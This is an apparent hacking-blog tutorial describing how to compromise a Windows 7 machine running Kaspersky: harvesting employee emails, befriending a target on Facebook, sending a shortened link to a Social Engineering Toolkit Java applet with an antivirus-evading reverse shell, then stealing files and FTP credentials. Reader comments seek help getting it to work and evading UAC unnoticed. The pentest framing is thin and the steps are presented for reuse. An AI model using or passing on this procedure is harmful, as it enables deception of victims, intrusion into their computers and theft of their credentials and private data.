How To Hack Windows 7 And Bypass Firewall And Kaspersky Antivirus

Ever tried to hack a windows 7?, Ever tired of bypassing antiviurs?, Then this is the tutorial for you.Ok, so you want to know how to attack a fully secured and protected windows 7 sp1 x64 with all security defenses working and running ( UAC,DEP,ASLR,EMET,etc.)

Not just that but also there is Kaspersky internet security 2012 activated and updated till this moment and running with default options like (firewall, application control, proactive defense, etc.)

As we know that windows 7 sp1 doesn’t have any remote exploits like (ms08-067) for xp and (MS09-050) for vista/ Because windows 7 is more secured and exploitation (exploit development) is very hard (good job Microsoft). Most internet users have Firefox, chrome and internet explorer not all of them but one for two of them (I am using all of them at once J )

And they have flash player from adobe and java from oracle so they watch online clips/movies from YouTube and enjoy online games and applications that requires java and flash payer. Most of them have anti-virus with firewall enabled by default, they use
( eset,avira,avast,Kaspersky,bitdefender,etc.)

Let’s take a look at the best anti-virus in the world "Real World" Protection Test - chart updated!

And download

We can see that Kaspersky internet security 2012 and bit defender are the best

But Kaspersky is the best one from my point of view J
Let’s imagine this scenario:
I am working as a penetration tester in a big security company; they asked me to conduct a penetration testing (client side/social engineering) no web penetration testing, network/wireless penetration testing just client side for a big customer

I said ok let’s do it.

We finished all paper work and other legal stuff then I am thinking now how I can penetrate this company???
My big company told me that the big customer web site URL is (
I made a quick search using Google

Then I used another tool called (the harvester), you can find it in backtrack 5 r2 or download it from
 I found many emails:

That is good, now I have a starting point to target and attack all emails I found
Now I know that this is a big customer and a big company so they must use a big security as well
And they have anti-virus and modern and secured operating systems like (windows 7 sp1)
So public exploits against IE,Firefox,flash,adobe and other local programs will not work and I will got detected using Anti-virus that will detect my exploits that I will send to my targets and remove it
So the best chance I have is to use an evil java applet to trick the victim to open it
But the victim must have java installed on his system
Ok this is good as many internet users have java installed including me J

Ok, time to hunt them all ….
I searched in

I entered all emails I have and found many interesting information like:

Note: this is FAKE I cannot disclose sensitive information about the big Company J

As you can see ( name,age,location,genere) and also Facebook account

I added this as a friend in Facebook and we are now friends

I chatted with him about his company and some general talk

After some time we have a small trust with each other (I can send him images or links)

Now I will start my backtrack 5 r2 machine and run this cool program

(Social engineering toolkit) AKA (SET)

Now time to attack my target

I will create an evil java applet
I will choose
2) Website Attack Vectors
 1) Java Applet Attack Method

After that
1)      Web Templates

And then
4. Facebook

Now the most important part, we must use a payload that is not detected by any security products like ( AV,IPS)

I know that my victim is using Kaspersky internet security 2012 and windows 7 sp1, I asked him in our facebook chat “what is the best anti-virus you recommended?”

He replied “Oh, the best one is Kaspersky internet security 2012, we are using it in our company and I personally use it installed on windows 7”

I tried in my penetration testing lab many of payloads and most of them detected by Kaspersky L
But the payload number 11

  11) SE Toolkit Interactive Shell            Custom interactive reverse toolkit designed for SET

Is working like charm and no AV detects it J

Then I choose it and choose port 443 to b my local port that payload will connect to me

Note:  I opened two ports in my router ( 443,80) , so the victim can connect to me when payload is successfully executed

Now we are good and ready

Now we must send our external ip to victim, we can use this website

And you will find your external ip like this

And we can hide our external ip by using website to shorten and conceal it

You can see that my external ip is hidden now!

Now I can send him this link and when he click on it he will see loaded with your java applet exploit. Note that Kaspersky is running

And he will click run (he is secured and don’t fear from anything  J )

Now he clicked run and I can see

Kaspersky is running and java is running and everything is secure J

But I have a remote shell on my target machine

Now I can do many things like:

Just press 1 to start interacting with the opened session

And then type help to view all supported commands

I always like a pure windows command shell

I will type “shell “

And I will type “tasklist” to view all running process and services


OMG “Kaspersky is running :)”

This is time to view files and download /upload and do some Real World Windows Post exploitation
And we owned our victim and found many sensitive files like usernames and passwords and some private docs and photos J and found filezilla ftp username and passwords and connect with those ftp credentials and you know the rest …… 

“Man , WE Defeated Them all !!”

Now it is time to write a nice report

I hope you enjoyed this (FAKE) Real World scenario

About The Author

Mohamed Ramadan is a security researcher from Egypt. He is interested in Penetration Testing, Malware Reverse Engineering, Securing Websites and Servers and Forensics.He also teaches Penetration Testing at

Subscribe to our Newsletter and receive updates directly via email - Get Ethical hacking and security tips directly to your inbox. Alternatively you can Join our Hackers Community on Facebook , Google+ and Twitter .

At RHA Infosec we provide different types of Security Testing from small business sites to Corporate Sites. Click Here to know more about our complete list of services.

Subscribe to RHA

Enjoyed this article?
Subscribe to "Rafay Hacking Articles" and get daily updates in your inbox for free!


Kindly Bookmark it and Share it with Friends:


  1. i'm using backtrack 5. Can it use as well?

  2. Wow!! Nice one !! really i expect this one ;)
    after very longtime nice one to read in RHA


  3. Nice post... i really like it :)

  4. please help!! When i choose option 2 "Website Attack Vectors" it gives me following error.
    " Sorry. Metasploit was not found. This feature does not work properly without Metasploit.
    Press {return} to go back to the main menu."

  5. How to open port in router???

  6. @Anonymous

    Try this:

    1. Go to cd /pentest/exploits/set/config
    2. gedit set_config
    3. search for something like metasploit path:
    4. Replace it with /opt/metasploit/msf3

  7. just click on this link to learn how to open ports in your router


  8. hello rafay bro can u write article about opening port of router.

  9. good mr.mohaab

    thanks :)

    my BaDer

  10. good mr.mohaab

    thanks :)

    my BaDer

  11. tells me that " Sorry. Metasploit was not found. This feature does not work properly without Metasploit.
    Press {return} to go back to the main menu."
    Im doing exactly what you say
    1. Go to cd /pentest/exploits/set/config
    2. gedit set_config
    3. search for something like metasploit path: this one wherei must search it ??? plz help me
    4. Replace it with /opt/metasploit/msf3

  12. Our group would like to ask the fellow commentors to join us here::::

  13. HI Rafay

    Thanks for sharing this wonderful tutorial
    I was able to do the test on Windows 7 box in my lab environment
    however when i typed regedit from "shell" , user ( me) has been asked if he wanted to open the application ( UAC), my question:
    How to defeat UAC ? as victim should not suspect anything .

    With regards


  14. I am using nmap software for detecting open ports. Before I installed avast internet security it was working perfectly fine but now it can't scan any open ports. Kindly help me how to bypass nmap through my windows firewall and avast firewall.

  15. Does this hack still work?

  16. You call this hacking ?

  17. I want to connect to remote computer through wifi without touching other computer...can you help me with it???

  18. Thanks...a lot man.It helped me a lot .

  19. Dame right, users are always the weakest link on any system


Blog Archive


Recent Comments


Rafay Baloch is an Independent security researcher, Internet marketer, Entrepreneur and a SEO consultant, He is the founder of RHA blog and multiple other blogs. Rafay got famous after finding a Remote Code Execution bug inside PayPal for which PayPal awarded him a sum of 10,000$ Read More..

Join In!

RHA © 2013. All Rights Reserved.